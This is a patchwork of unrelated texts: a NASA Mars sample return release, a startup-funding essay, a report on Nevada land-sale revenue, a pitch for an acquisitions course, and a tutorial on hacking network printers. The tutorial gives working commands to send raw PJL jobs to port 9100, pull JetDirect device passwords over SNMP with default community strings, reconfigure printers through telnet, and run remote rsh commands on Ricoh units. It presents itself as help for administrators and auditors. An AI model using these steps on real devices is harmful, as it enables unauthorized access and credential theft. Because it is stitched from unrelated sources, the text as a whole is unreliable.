The team established a common strategy for launching a Mars sample return mission and achieving scientific objectives that can be met only by returning Martian soil to Earth .
" For Europe this is a major step to shape the future of the ESA Aurora Exploration Programme in 2008 , " said Bruno Gardini , ESA 's Exploration Program Manager .
The Aurora Programme is part of Europe 's strategy for space , initiated by ESA in 2001 to create and implement a long - term European plan for robotic and human exploration of the solar system .
The next steps in preparing for a Mars sample return mission includes more detailed international trade studies on engineering and mission specifics , greater detail on science and sample requirements , and definition and requirements for Earth - based facilities .
IMARS will address the technical issues in upcoming meetings , along with preliminary discussions of the possible roles of interested nations and agencies .
### Dwayne Brown
Headquarters , Washington
202-358-1726 NEWS RELEASE : 07-269
The Rules of Success
As MicroSolutions became more and more successful , and as I paid attention to the common traits of businesses that I saw succeed and those I saw fail , I came to realize that there are “ Rules of Success ” that I saw in companies that excelled .
Where companies failed to follow those rules , inevitably , they failed .
I found myself checking with “ My Rules ” before I made decisions .
When I traded stocks or considered investments in companies , I applied The Rules to their business before I made a decision .
The Rules are not infallible .
They have their limits .
I ’m an entrepreneur .
My businesses have had hundreds and now more than a thousand employees .
My world has been limited to starting , building , growing and running businesses that are never going to make the Fortune 500 .
My dreams were never to build the biggest corporation in the world .
So , if you are a middle level manager in a Fortune 500 company , these rules may not help you manage your department .
If you are the CEO of a Fortune 500 company with tens of thousands of employees , some rules will apply , some wo n’t , but where they will help you is to know how little guys coming out of nowhere are going to disrupt your business .
Where
The Rules will help you is if you are considering starting , or currently run your own business .
There are always exceptions to any rules , but I can assure you that those exceptions will be rare .
Entrepreneurs that do n’t follow the rules are far more likely to fail .
There is no doubt about it .
So let ’s start at the beginning .
Rule # 1 : Sweat Equity is the best start up capital .
The best businesses in recent entrepreneurial history are those that have been started with little or no money .
Dell Computer , MicroSoft , Apple , HP and tens of thousands of others started in dorm rooms , tiny offices or garages .
There were n’t 100 page long business plans .
In all of my businesses , I started by putting together spreadsheets of my expenses , which allowed me to calculate how much revenue I needed to break even and keep the lights on in my office and my apartment .
I wrote overviews of what I was selling , why I thought the business made sense , an overview of my competition and why my product and / or service would be important to my customers , and why they should buy or use it .
All of it on a piece of yellow paper or in a word processing file , and none of it cost me more than the diet soda I was drinking while I was writing it up .
I remember the foundation for each of my businesses .
MicroSolutions was very simple .
To use microcomputers and software to help our customers become more productive , profitable and gain a competitive advantage .
AudioNet , which became broadcast.com was simple as well : use the internet to enable real - time , worldwide communications of entertainment and business applications .
HDNet is to create great entertainment , originated in High Definition format to allow our distributors to compete for the highest margin customers .
Once I could put the idea on paper , I gave the company a name .
From there , I took the most important steps : I tried to find people to shoot holes in it .
When we started AudioNet , I remember getting an appointment with Drew Marcus of Alex Brown ( it could have been Larry , but I think it was drew :) , an investment banking company .
Drew followed the radio industry and I wanted to see if there was anything he saw from his experience that would blow up the concept .
He loved the idea .
We took it to Dan Halliburton of Susquehanna Radio .
He was an executive in charge of several Dallas area radio stations .
We discussed how he could broadcast his stations over the Internet using AudioNet and reach the in office market where there were n’t many radios on desks , and few of those could pick up the AM signal of his stations .
He loved it .
I took it to Tim and Eric Crown , who ran a newly public company called Insight Enterprises .
I asked them if it made sense to broadcast their quarterly earning conference calls over the internet so their investors and the research analysts who followed them could easily listen to the calls and get up to date information , or listen to an archive of the call if they missed it .
They thought it would help them reach their Investor Relation goals less expensively .
Each step cost me next to nothing to get great feedback .
Each enabled me to check the foundation of my business idea to see if it was easy to shoot holes in it , and most importantly , they all served as sales calls .
Each company eventually became a customer of ours .
I went through this in each of my businesses .
The step gave me confidence that my business idea was valid .
That there was a chance of success .
At this point , many entrepreneurs think the next step is to take all this feedback , update their 100 page business plans and go out and raise money .
It ’s as if the missing link for success in a business is cash to get started .
It ’s not .
Far more often than not , raising cash is the biggest mistake you can make .
Most entrepreneurs tend to think in terms of what raising money means to them .
How it can get them started ?
How many people they can hire ?
How much they can spend on office space ?
How much they can pay themselves ?
They forget to put themselves in the position of the person or company they are asking for money from .
They think they are considering that person ’s position by making up numbers and calling them expected returns for the investor .
If you only give me X dollars , you will get X pct back in X years .
You will double or triple your money in X years .
Any investor worth anything knows you are just making these numbers up .
They are meaningless .
Worse , if you tell a savvy investor that the market is X billions of dollars and you just need one or some low percent to make zillions , you are immediately kicked to the curb .
These investors , including myself , know what you do n’t , and they are not telling you .
The minute you ask for money , you are playing in their game , they are n’t playing in yours .
You are at a huge disadvantage , and it ’s only going to get worse if you take their money .
The minute you take money , the leverage completely flips to the investor .
They control the destiny of your dreams , not you .
Investors do n’t care about your dreams and goals .
They love that you have them .
They love that they motivate you .
Investors care about how they are going to get their money back and then some .
Family cares about your dreams .
Investors care about money .
There is a reason why venture capitalists are often referred to as Vulture Capitalists .
The minute you slide off course from the promises you made to get the money , your dreams fall in jeopardy .
You will find yourself making promises to keep investors at bay .
You will find yourself avoiding your investors .
Then you will find yourself on the outside looking in .
The reality of taking money from non family members is that they are doing it for only one reason , to make more money .
If you ca n’t deliver on that promise , you are out .
You will be removed from the company you started .
You will find someone else running your dream company .
If this sounds like a scene out of the Sopranos or an episode you would watch on TV about a loan shark , you are right .
The only difference is that it ’s all legal .
There are only two reasonable sources of capital for startup entrepreneurs , your own pocket and your customers pockets .
I personally would never even take money from a family member .
Could you imagine the eternal grief and guilt from your mom , dad , uncle or aunt because you blew your nephews college money or the money for grandmas last vacation …
I cant .
You should n’t have to take money from anyone .
Businesses do n’t have to start big .
The best ones start small enough to suit the circumstances of their founders .
I started MicroSolutions by getting an advance from my first customer of $ 500 .
The business did n’t grow quickly in the first couple years .
We did n’t grow past 4 people in the first couple years , and we all worked dirt cheap .
So what ’s wrong with that ?
It ’s OK to start slow .
It ’s ok to grow slow .
As much as you want to think that all things would change if you only had more cash available , they probably wo n’t .
The reality is that for most businesses , they do n’t need more cash , they need more brains .
To gauge the law ’s impact since its passage in 1998 , The New York Times analyzed data from the United States Bureau of Land Management , the landlord for the federally owned lands .
The analysis covered the more than 29,000 acres sold under the law as of Nov. 1 , as well as the $ 2.3 billion in expenditures allocated to projects as of Aug. 31 by the Department of the Interior , which oversees distribution of the money .
The examination found the following :
¶ More than $ 1 billion in proceeds from the federal land sales have been allocated for parks , trails and nature areas that often amount to public amenities — many of which elected officials say they would not have been able to pay for otherwise .
The projects have enhanced property values , and benefited big - name developers , including Focus Property Group , the American Nevada Company , the Del Webb Corporation and the Olympia Development Group , all of which have bought large parcels of arid public lands and turned them into elaborate housing tracts .
¶ Nevada ’s schools , which have long sought more money from state lawmakers who resisted raising taxes as enrollment mushroomed , have received $ 150 million from the sale of the federal lands .
The interest on that money has paid for expenses including teachers ’ salaries , utility bills and textbooks , which in other states would usually be underwritten by local property taxes .
The 1998 law uses the same legal framework as a 1920s land act under which the Clark County School District has bought some 685 acres through noncompetitive direct sales for an average of $ 10 an acre since 2004 to provide land for public schools .
¶ The Southern Nevada Water Authority , the agency that has long provided cheap water to the valley ’s two million residents , has received $ 285 million from the federal land sales , which it has used on a variety of water treatment , testing and transport projects , including facilities at drought - plagued Lake Mead .
Plans for revenue from future land sales , water officials say , could include work on a pipeline to import water from 250 miles away .
¶ The acquisition and protection of environmentally sensitive land in private hands was a central element of the law ’s purpose , but allocations for those purchases have accounted for only about 15 percent ( $ 346.1 million ) of the $ 2.3 billion in approved spending .
Moreover , there has been a net loss of protected land : thus far , some 34,468 acres of public land have been sold or exchanged , while a little more than 20,000 acres of environmentally sensitive land have been bought , though federal officials say other big deals are pending .
¶ Spending on conservation projects , a focus of an amendment to the law in 2002 , has also lagged behind other construction - heavy categories .
Some $ 180 million has been allocated for continuing projects like programs to fight litter and dumping , studies of off - road vehicle and water strategies , and wild horse and burro management .
Buy a Business
How to Buy a Business
This is a course on aggressive growth through acquisitions .
It ’s designed for the successful entrepreneur currently running a successful business .
At the very least , the student should have recent experience in operating a successful venture .
Warning : Most Entrepreneurs Have Nothing to Sell at the End
Here ’s a horrifying statistic that all business brokers are painfully aware of : 80 % of all small business are never sold .
When the owner decides to retire or quit he or she discovers that buyers do not see any value worth paying for .
Most small business are simply shuttered as a result .
Imagine yourself being among the 80 % .
You have invested years and possibly decades building your business .
Your dream is to eventually sell it for a million or two and retire in modest comfort .
Then at the end you discover that you have nothing to sell .
Nothing .
In most cases , you are offering the public a chance to buy a job .
And nobody is interested in paying 3X or 4X for an annual income of Y .
In fact there is ultimately only one reason to create a business of your own , and that is to sell it .
– Michael Gerber , The E - Myth Revisited
This is a course on building real value that can be sold eventually .
In most cases , the buyer will be a larger corporate one .
It ’s also a course on how to buy businesses .
The reason for this is that to achieve the kind of size that deep - pocketed buyers will be interested in calls for an advanced growth strategy .
In plain English , we are talking about growth via acquisitions .
The course is based on decades of personal experience as a business broker , business buyer , and a fascination with how most self - made men have made their fortunes .
Free clue :
They did so by wheeling and dealing in cashflow producing assets ( usually small businesses ) .
Read on only if you are have a serious interest in upping your game .
Should You Continue Reading ?
Take a quick inventory :
– I have experience owning or running a successful offline business .
– I am ambitious but have patience and a long term commitment to building something big .
– I ’m not looking for a get - rich - quick scheme .
If you answered yes to all three , please continue .
If you did n’t you are wasting your time here .
The 25 Levels of Entrepreneurship
Entrepreneurship is like a 25 - level computer game .
Do you want to play at the top level ?
Do you want to engage in Full Contact Capitalism ?
If you answered yes to these questions , read on about the best “ how to buy a business ” course on the planet , and yes , this course does incorporate many in - depth lessons from self - made billionaires on how to become a billionaire .
If you ’re asking what billionaires and buying businesses have to do with one another , allow me to explain .
The majority of billionaires made their fortunes wheeling and dealing in businesses .
In many cases , they started off small and slow acquiring tiny businesses .
Then as their skill and confidence increased over the years , they started buying bigger businesses .
In some cases , they ended up doing M&A deals with large public companies .
My belief is that if you ’re going to learn about business then learn from the best .
The longest journey begins with but a single step .
– Ancient Chinese Proverb
Do you have the courage to take even the first step ?
WARNING !
However , before you read on you need to understand that this is not a get - rich - fast course by any stretch of the imagination .
Rather it ’s a course for serious entrepreneurs who want to learn how to grow their business through acquisitions as either a primary or secondary strategy .
That ’s how most billionaires become billionaires .
They are deal - makers who acquire control of a business–or “ cashflow , ” as I prefer to call them–and then just keep acquiring more and more .
Think of it this way , this course is about building systems and adopting best practices for :
- finding deals ,
- determining if they are do - able ,
- negotiating the deal ,
- financing the purchase ,
- increasing the acquisition ’s value ,
- managing them remotely , and finally ,
- selling them at the best price .
Yes , the course incorporates a lot of insights into the above topics from billionaires who made , in some cases , hundreds of acquisitions .
The point of taking the course is to learn from the best and then see how far you can get .
Most of us will never be billionaires but that does n’t mean that we ca n’t learn from them and become lesser tycoons .
( If you ’re looking for something that promises to make you a billionaire , I can put you in touch with a Nigerian prince who needs help in extracting $ 43 billion from his homeland to the USA .
Last I heard , he was willing to split the proceeds 50/50 .
I still have his email address . )
How Billionaires Become Billionaires
Anyone who has built a company from the ground up understands that the initial high growth rate levels off all too quickly .
At that point the entrepreneur has a choice between :
1 ) fighting the Law of Diminishing Returns to extract every last inch of growth from the existing company , or
2 ) adding growth through acquisitions of competitors and related companies to his strategy .
In the vast majority of cases , the first route provides far slower growth than the second .
Moreover , most people go with the former simply because they do n’t have the skill set and confidence to employ an acquisitions strategy .
A study of how billionaires become billionaires shows that they employ the second route because it offers the possibility of 50 % per annum growth rates , or better , over a prolonged period of time .
That ’s why they ’re billionaires .
By the way , this is also by far the most fun way to make money because you will never have a chance to get bored .
There ’s always a new deal to work on .
The people who can grow just one business for four or five years without burning out are rare .
Meanwhile billionaires frequently work well into their eighties and nineties because what they do is actually fun .
In fact , it ’s so much fun that the people who start off by employing this strategy as a secondary one frequently adopt it as their main one once they have a deal or two under their belts .
Here ’s one more reason why you should seriously consider learning how to grow your business this way : there ’s less competition .
While the masses today are focused on building the 3,876,734th “ social networking ” site , you will be operating in a rarefied atmosphere with a much smaller number of competitors .
Are These Real Billionaire Strategies ?
The answer is a resounding “ yes ! ”
This is a course for both deal - makers and aspiring deal - makers .
We study self - made billionaires and focus in on their early days so that you can start off on the right foot , so to speak .
There ’s nothing like starting off on a new adventure with a reliable road map .
It boosts your confidence level .
The most sure - fire way to build true wealth that can be sold at the end of the day , if that ’s your goal , is through a combination of multiple - company building and mergers & acquisitions activity over an extended period of time , usually covering a decade or more .
Billionaires rarely rely on just one company to make them billionaires .
( In most cases , that ’s as realistic as pinning one ’s hopes on winning the Powerball Lottery . )
Instead they understand that the road to wealth consists of a long series of deals involving the purchase , improvement , and sale of many business assets .
Unfortunately , it ’s a seemingly tough line of work to step into .
Why ?
Well first of all , deal - making is normally a game for established players .
By “ established ” I mean that they have achieved the critical mass in both financial strength and reputation necessary to be taken seriously by the other players in the field .
Second , most people are terrified of even taking the first step into this lucrative field because they do n’t understand that there ’s a proven winning formula they can employ successfully .
This course is designed to teach you the proven strategies of people who have been successful at it and how to start using them today .
The program will accomplish this by :
1 ) teaching you advanced entrepreneurial and intermediate - level mergers & acquisitions ( i.e. , “ M& A ” ) strategies , and
2 ) helping you to create workarounds for any obstacles ( e.g. , lack of capital , experience , and reputation ) you may face in entering this field .
As the old saying goes , where there ’s a will , there ’s a way .
However , if you ’re held back by wimpiness or laziness , I ca n’t help you .
Nothing can .
The meek shall not inherit the world .
We happen to live in a very Darwinian world .
Every day a gazelle wakes up and knows it must outrun the fastest cheetah in order to live .
Every day a cheetah wakes up and knows it must outrun the slowest gazelle or it will not survive .
It does n’t matter if you ’re a gazelle or a cheetah , when you wake up you better start running !
- Anon
Now let ’s continue .
The course requires that you have basic entrepreneurial skills as well as the ability to recognize opportunities in your industry .
The great thing is that the course will show you how to spot both existing and emerging opportunities .
The course also requires that you have the patience and self - discipline to study , learn , and practice the strategies and tactics it will teach you .
The most important quality to have for success is a willingness to learn and implement new lessons .
This is not for the meek or those seeking get - rich - quick schemes .
The critical ingredient is getting off your butt and doing something .
It ’s as simple as that .
A lot of people have ideas , but there are few who decide to do something about them now .
Not tomorrow .
Not next week .
But today .
The true entrepreneur is a doer , not a dreamer .
– Nolan Bushnell , founder of Atari and Chuck E. Cheese’s
Hacking Network Printers ( Mostly HP JetDirects , but a little info on the Ricoh Savins )
Hacking Network Printers
( Mostly HP JetDirects , but a little info on the Ricoh Savins )
By Adrian " Irongeek " Crenshaw
Hack a printer you say , what kind of toner have you been smoking , Irongeek ?
Well , I 'm here to tell you , there 's more that can be done with a printer to compromise network security than one might realize .
In the olden days a printer may not have been much of a concern other than the threat from folks dumpster diving for hard copies of the documents that were printed from it , but many modern printers come network aware with embedded Operating Systems , storage and full IP stacks .
This article will attempt to point out some of the more interesting things that can be done with a network based printer to make it reveal information about its users , owners and the network it 's part of .
Some of this article may seem a little Black - hat as it concentrates more on the breaking - in than the keeping - out .
However I feel this information will be useful to system administrators and auditors so that they know what sorts of things to look out for when it comes to network printers .
If you want more advice on how to lock down your network printer visit your vendors web site .
A guide from HP is linked at the bottom of this article for your convenience .
If nothing else , this article may get you thinking in the right direction .
For my tests I will mostly be using a Hewlett - Packard LaserJet 4100 MFP ( Fax / Printer / Copier / Scanner ) , an HP JetDirect 170x and a HP JetDirect 300X ( J3263A ) but I will also touch a bit on the Ricoh Savin series of printers lest you think HPs are the only network printers with security problems .
Much of this article will read like a huge brain dump , sort of disorganized and hazy like my mind .
It all started as a project for Droop 's Infonomicon TV and it snowballed from there with no specific direction .
Bear with me as I clean it up and other folks send me new additions and suggestions to make this article more useful .
The most recent version of this article can be found at : http://www.irongeek.com/i.php?page=security/networkprinterhacking
Table of Contents :
Intro to the concepts
There are several TLAs ( Three letter acronyms ) I will be using though out this article so I best get them out of the way now .
PCL stands for Printer Control Language , which was developed by HP and has become one of the most common printer protocols .
Another page description language you should be aware of is PostScript ( PS ) which was designed by Adobe to allow for more complicated things to be printed from a plotter / printer .
PJL ( Printer Job Language ) is an extension of PCL that can tell a printer what to do , from changing device settings to transferring files .
There are also three major network printing protocols you should be aware of .
Here 's a table with some of the pertinent information about each protocol :
Name Meaning Port LPD Line Printer Daemon protocol 515/tcp IPP
aka
Berkeley printing system Internet Printing Protocol 631/tcp JetDirect
aka
AppSocket
aka
Raw
aka
PDL - datastream 9100/tcp
Since my focus is on JetDirects I will mostly be talking about and using AppSocket / PDL - datastream , but since many JetDirects can also work with IPP and LPD , and many non HP made network printers also use AppSocket , you should be aware of the existence of all three .
There 's are also network printers that use the IPX , Appletalk and SMB ( some Savins for example ) protocols to communicate .
I 'll not cover IPX and Appletalk because of my lack of experience with them , maybe someone else who reads this page will submit some info on them for me to post ( credit will be given ) .
SMB I may try to cover at a later time .
Now that the formalities are out of the way , lets start playing with printers .
Diagnostics page
The pictures above are of a external JetDirect 170x box .
Notice the picture on the right ; on the far right hand side you will notice a little button labeled " test " .
Pressing this button on most JetDirect boxes will print out a diagnostic page listing statistics and the IP setting for the JetDirect box .
If your printer has an internal JetDirect card you will have to negotiate the menus to find out how to print this diagnostics page .
Once you hit the test button the printer should print out a page or two that lists information like host name , MAC address , IP Address , subnet mask , default gateway , firmware revision and some general statistics .
The IP / host name will be especially useful if you want to bypass print quota software by setting up direct IP printing on your Windows or Linux box .
If you do n't have physical access to the JetDirect box you can still find its IP or host name by seeing what its port is listed as if that network printer has been setup on a Windows box you have access to .
As you can see by the graphic on the left , the host name for this JetDirect box is npib1002c .
Sometimes you will see a port listed as something like IP_192.168.1.102 , where obviously 192.168.1.102 is the JetDirect 's IP .
You can pretty much use a host name or an IP interchangeably on your LAN , and if the host name has a fully qualified domain name you should be able to address it from the Internet as well .
If you do n't have access to a JetDirect box , or if your PC is not connected to one , do n't despair .
In next few sections I will describe how to find these printers on the LAN / Internet using Nmap and JetAdmin .
Stupid Printer Tricks
I called this section Stupid Printer Tricks because while these activities are n't very technical , they do illustrate the simplicity of the RAW / AppSock protocol that listens on port 9100 / tcp on JetDirects and most other network printers .
Try this , find your printers IP using the Diagnostics page then web surf to :
http://your-printers-ip:9100
The " :9100 " at the end is there to tell your browser to connect on port 9100 / tcp .
When you try to establish the connection you should notice that the browser does not go anywhere , this is because what 's running on port 9100 / tcp is not a web server .
Click the stop button on your browser to tell it to stop trying to connect then go take a look at the printer .
Depending on what browser you use you should see a print out something like one of the following :
Firefox Internet Exploiter GET / HTTP/1.1
Host : tux :9100
User -Agent : Mozilla / 5.0 ( Windows ; U ; Windows NT 5.1 ; en-US ; rv:1.8.0.1 ) Gecko/20060111 Firefox /1.5.0.1
Accept : text/xml , application/xml , application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept - Language : en-us , en;q=0.5
Accept -Encoding : gzip , deflate
Accept - Charset : ISO - 8859-1,utf-8;q=0.7,*;q=0.7
Keep - Alive : 300
Connection : keep - alive GET / HTTP/1.1
Accept : image / gif , image / x- xbitmap , image / jpeg , image / pjpeg , application / x- shockwave - flash , application / vnd.ms-excel , application/vnd.ms-powerpoint , application / msword , */*
Accept - Language : en-us
Accept -Encoding : gzip , deflate
User -Agent : Mozilla / 4.0 ( compatible ; MSIE 6.0 ; Windows NT 5.1 ; SV1 ; .NET CLR 1.1.4322 ; .NET CLR 2.0.50727 )
Host : test:9100
Connection : Keep - Alive
You see , anything that the printer sees coming in on port 9100 / tcp it tries to read as a print job .
The two texts you see above are HTTP get requests for the root document of the server .
The network printer does not understand this and just tries to print the request out as text .
Another thing you can try is telneting to port 9100 ( we will assume your printer 's IP is 192.168.1.2 ) , typing in some text , and seeing it print :
Irongeek : ~# telnet 192.168.1.2 9100
Trying 192.168.1.2 ...
Connected to 192.168.1.2 .
Escape character is ' ^ ] ' .
hello printer
^ ]
telnet > quit
Connection closed .
Irongeek : ~#
You should now see a print out that just has the words " hello printer " on it .
The " ^ ] " represents the pressing of the Control key and the ] bracket at the same time .
The above example was done in * nix , but the same commands should work in Windows .
Keep in mind you may not see all of what you type in ( the parts in red ) unless you have local echo turned on ( which seems to be off by default in Windows ) .
There are exceptions to network printers just printing out everything sent to port 9100 .
This trick , for which there will be more details given later , should change LCD display to say what you want .
It 's not supported on all printers , but If you have an HP it should work .
I 've got to thank Dipswitch for pointing out that you do n't need fancy tools or code to do it ( but the tools do make it easier ) .
With Telnet :
Irongeek : ~# $ telnet 192.169.1.2 9100
@PJL RDYMSG DISPLAY =" Some Text "
^]quit
Irongeek : #$ Or Netcat :
Irongeek : ~# $ echo @PJL RDYMSG DISPLAY = \" Some Text\ " | netcat -q 0 192.168.1.2 9100
Irongeek : #$
JetDirect password notes
Most of the time folks never even turn the JetDirect 's password options on , but if they do they quickly find that they do n't always work in logical ways .
If you are using a newer JetDirect box like one of the following :
680N ( J6058A )
615N ( J6057A )
610N ( J4169A , J4167A )
380X ( J6061A )
310X ( J6038A,250M ( J6042A )
75X ( J6035A
or an HP printer with and internal JetDirect card like :
HP LaserJet 4100 series
HP LaserJet 8150 series
HP LaserJet 9000 series
HP Color LaserJet 4550 series
HP Color LaserJet 4600
HP Designjet 5000 series or HP Business Inkjet 2600
then the telnet and device password used by the Web interface and JetAdmin software are the same .
If you telnet in you will be prompted for a user name and password .
The user names " root " , " admin " , " administrator " and " supervisor " are all valid and equivalent .
If you are using an older JetDirect box like one of the following :
600N ( J3110A , J3111A , J3112A , J3113A )
400N ( J4100A , J4105A , J4106A )
300X
500X
170X ( J3296A , J4101B , J3263A , J3264A , 3265A , J4102B , J3258B )
then things are more confusing .
First , if you telnet in you will only be prompted for a password ; no user name is asked for .
If you setup a password for the telnet service it may not be the same password for the web interface , and vice versa .
In other words there are two passwords on at least some JetDirect boxes , one for telneting into it and one for the web interface / JetAdmin software .
Telnet password are case sensitive but Web / JetAdmin passwords are not .
Telnet passwords are limited to 16 characters , Web / JetAdmin passwords to 12 .
Just so you know , Hijetter ( discussed later ) may report the password as disabled even if both passwords are set , but that 's ok since it bypasses passwords anyway .
The Web interface and JetAdmin use SNMP ( Simple Network Management Protocol ) to control the JetDirect boxes and require that you know the password , but I 've read that other third party SNMP configuration utilities will just ignore the password altogether and can connect and control the JetDirect anyway .
It might be a good idea for some to change their SNMP community names to something other than the default public / private , but even if they do they could still be sniffed off of the wire unless they have a more recent JetDirect that supports SNMPv3 and SSL / TLS .
If you use the JetAdmin for Window 2000 desktop software be aware that it automatically stores passwords in the registry once you use it .
For example , if the MAC address of a JetDirect box was 001083A2C913 then JetAdmin would store the password " password " in User \Software \Hewlett - Packard \HP JetAdmin\DeviceOptions \001083A2C913 in a value called " Access " as " 50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44,00,00,00 " .
In case you do n't notice it , this HEX string is the password " password " converted to all uppercase , with each letter turned to it 's HEX equivalent , with a null character between each password character , and then null padded .
Brute forcing these passwords might be an option since logging on many network printers is n't all that involved .
As you already know telnet is unencrypted so sniffing those passwords is trivial .
As I found by sniffing with Ethereal , the web interface on older Jetdirects ( really a Java applet ) and JetAdmin use SNMP to configure the JetDirect box and also pass their password as plain text .
Look for the password just before the string " =108 " in the dumps .
Some newer Jetdirects do n't do this , and can use SSL to encrypt the connection .
If you set a password on a JetDirect box while you are playing around with it and forget what it is , all you have to do is a hard reset .
Unplug the power cord , hold down the test / status button , and while still holding the button plug the power back in .
The password and all of the other settings should now be cleared .
Getting a JetDirect password remotely using the SNMP vulnerability
I was cruising around SecurityFocus.com looking for JetDirect exploits and I came across a dooze :
http://www.securityfocus.com/bid/7001/exploit
Since the link above is rather shy on details I 'll show you the exploit step by step .
It seems that the device password for many JetDirects is stored in almost plain text and is accessible via SNMP using the read community name .
Most folks leave their SNMP community name as " public " but even it has been change it 's likely sniffable .
Also try " internal " as the community name as this is the default write community name on many JetDirects .
Reports are that on some JetDirects , even if you change the community name , " internal " will still work .
With the Net - SNMP toolset the password is easy to recover :
Irongeek : ~# snmpget -v 1 -c public 192.168.2.46 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
SNMPv2-SMI::enterprises.11.2.3.9.1.1.13.0 = Hex - STRING : 50 41 53 53 57 4 F 52 44 3D 31 30 38 3B 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Irongeek : ~#
Notice the hex string .
In Hex 50=P,41=A,53=S,53=S,57=W,4F=0,52=R,44=D,3D==,31=1,30=0,38=8,3B= ;
In other words , " PASSWORD=108 ; " which means the password is " PASSWORD " .
I also tried it after changing the password to newpassword , and likewise " 50 41 53 53 57 4 F 52 44 3D 31 30 38 3B " is " NEWPASSWORD=108 ; " .
Anything before the " =108 ; " is the password .
For those too lazy to do the HEX to ASCII conversion themselves check out :
http://nickciske.com/tools/hex.php
Also note that I entered my passwords in lowercase , but they were stored in uppercase .
These passwords are case insensitive .
Some of the vulnerable JetDirects are :
HP JetDirect J3263A
HP JetDirect J3113A
HP JetDirect J3111A
Other JetDirects may also be v\erle , so it 's worth testing .
I tried it with my Hewlett Packard HP JetDirect 300X ( J3263A ) and installing the latest firmware ( H.08.49 ) seems to fix this problem but I imagine there are still a lot of un -patched JetDirects out there .
Some print servers like the HP J3258A JetDirect 170X do not have user upgradeable firmware at all so you are stuck with the firmware they were shipped with .
The only way to fix the vulnerability on them is to by a new JetDirect .
Controlling the JetDirect box with telnet / web browser
Most JetDirect boxes can be configured with a web browser or via a telnet session .
Below you will see a screen show of the web base configuration tool .
Just type the IP or host name of the JetDirect box into the address bar of your favorite Java enable web browser and it should work .
Here is an example of connecting to a JetDirect box with a telnet session , bringing up the help screen and resetting the host name :
Irongeek : ~# telnet 192.168.1.2
Trying 192.168.1.2 ...
Connected to 192.168.1.2 .
Escape character is ' ^ ] ' .
HP JetDirect
Please type " ? " for HELP , or " / " for current settings
> ?
To Change / Configure Parameters Enter :
Parameter - name : value < Carriage Return >
Parameter - name
Type of value
ip : IP - address in dotted notation
subnet - mask : address in dotted notation ( enter 0 for default )
default - gw : address in dotted notation ( enter 0 for default )
syslog - svr : address in dotted notation ( enter 0 for default )
idle - timeout : seconds in integers
set - cmnty - name : alpha-numeric string ( 32 chars max )
host - name : alpha-numeric string ( upper case only , 32 chars max )
dhcp - config : 0 to disable , 1 to enable
allow : < ip > [ mask ] ( 0 to clear , list to display , 10 max )
addrawport : < TCP port num > ( < TCP port num > 3000 - 9000 )
deleterawport : < TCP port num >
listrawport : ( No parameter required )
addstring : < name > < contents >
contents -
For non-printable characters use
\xx for two digit hex number
deletestring : < name >
liststring : ( No parameter required )
addq : < name > [ prepend ] [ append ] [ processing ]
prepend -
The prepend string name
append -
The append string name
Use NULL for no string
processing - RAW , TEXT , or AUTO
deleteq : < name >
listq : ( No parameter required )
defaultq : < name >
ipx / spx : 0 to disable , 1 to enable
dlc /llc : 0 to disable , 1 to enable
ethertalk : 0 to disable , 1 to enable
banner : 0 to disable , 1 to enable
Type passwd to change the password .
Type " ? " for HELP , " / " for current settings or " quit " to save - and - exit .
Or type " exit " to exit without saving configuration parameter entries
> /
===JetDirect Telnet Configuration===
Firmware Rev. : H.08.32
MAC Address : 00:60 :b0:6d:47:c6
Config By : DHCP
IP Address : 192.168.1.2
Subnet Mask : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server : Not Specified
Idle Timeout : 90 Seconds
Set Cmnty Name : Not Specified
Host Name : NPI6D47C6
DHCP Config : Enabled
Passwd : Disabled
IPX / SPX : Enabled
DLC/LLC : Enabled
Ethertalk : Enabled
Banner page : Enabled
> host - name : BUTTMONKEY
> /
===JetDirect Telnet Configuration===
Firmware Rev. : H.08.32
MAC Address : 00:60 :b0:6d:47:c6
Config By : DHCP
IP Address : 192.168.1.2
Subnet Mask : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server : Not Specified
Idle Timeout : 90 Seconds
Set Cmnty Name : Not Specified
Host Name : BUTTMONKEY
DHCP Config : Enabled
Passwd : Disabled
IPX / SPX : Enabled
DLC/LLC : Enabled
Ethertalk : Enabled
Banner page : Enabled
> quit
===JetDirect Parameters Configured===
IP Address : 192.168.1.2
Subnet Mask : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server : Not Specified
Idle Timeout : 90 Seconds
Set Cmnty Name : Not Specified
Host Name : BUTTMONKEY
DHCP Config : Enabled
Passwd : Disabled
IPX / SPX : Enabled
DLC/LLC : Enabled
Ethertalk : Enabled
Banner page : Enabled
User Quitting
Connection closed by foreign host .
Irongeek : ~# Important note about using telnet to configure a JetDirect box :
You must use the " quit " command to end your session if you want your changes to be saved .
If you just kill the telnet terminal all of the changes you made during the session will be lost .
RSH commands and Richo Savin Aficio Printers I 've got to thank Mslaviero for introducing me to this aspect of Richo Savin printers .
Check out his site : http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/
Normally you might want to login to your Savin with telnet , but it 's likely password protected ( the default password is " password " on some Savins ) .
Do n't fear , there is another way you may be able to execute some commands on the printer .
You may have noticed from an Nmap scan that your Richo Savin has port 514 / tcp open .
Guess what ?
You can use the rsh * nix utility to execute commands remotely on the box .
First you will want to make sure you have the rsh client installed .
Rsh has largely been depreciated because of it's unencrypted connections and other security problems .
